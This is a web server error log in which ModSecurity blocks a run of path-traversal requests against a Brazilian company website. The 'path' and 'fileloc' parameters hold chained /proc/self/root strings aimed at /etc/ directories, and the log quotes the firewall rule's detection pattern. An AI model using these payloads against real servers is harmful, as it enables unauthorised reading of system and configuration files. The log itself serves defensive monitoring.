[Fri Mar 20 05:11:22.995290 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:60536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BKta6ubjKNq_cu4awDQAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:27.904794 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.241.31:60546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BLwF0L0L-SsrnPo5HMQAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:28.716122 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:43858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BMLninkcc-iUj5Ao9RAAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:32.551160 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.241.31:54900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BNPHIg5MgXLBnicPY3AAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:34.978120 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:54908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BNhCii7xarUs8iHZFEwAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:40.578521 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:54918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BPBCii7xarUs8iHZFHQAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:46.713901 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:57352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BQhCii7xarUs8iHZFIwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:12:24.610366 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:51160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BaDJ3M9BSuKP7CAbxvgAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:13:02.646777 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.241.31:34074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Bjl1pVZ5mVmJwsFMO3gAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:11.523315 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.241.31:60368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Bl_HIg5MgXLBnicPZDwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:12.836730 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.241.31:43754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BmBCii7xarUs8iHZFUAAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:15.247589 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.241.31:43764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Bm11pVZ5mVmJwsFMO4AAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:36.999673 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:43770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BsOoXxyEfFpUF8f9hegAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:38.286961 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:40918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BsjJ3M9BSuKP7CAbx4AAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:39.667035 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:40926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Bs9a6ubjKNq_cu4awfgAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:40.935886 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.241.31:40938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BtPHIg5MgXLBnicPZJQAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:13:49.293939 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.241.31:40954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BvfqxLDW4GITHUkTB4gAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:53.767006 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:52654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BweoXxyEfFpUF8f9hhQAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:13:58.667657 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:52464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Bxta6ubjKNq_cu4awnAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:14:05.517421 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.243.128:53258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BzfXLqtnMIWvjpaJ5IAAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:14:08.496004 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:52656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0B0OoXxyEfFpUF8f9hlwAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
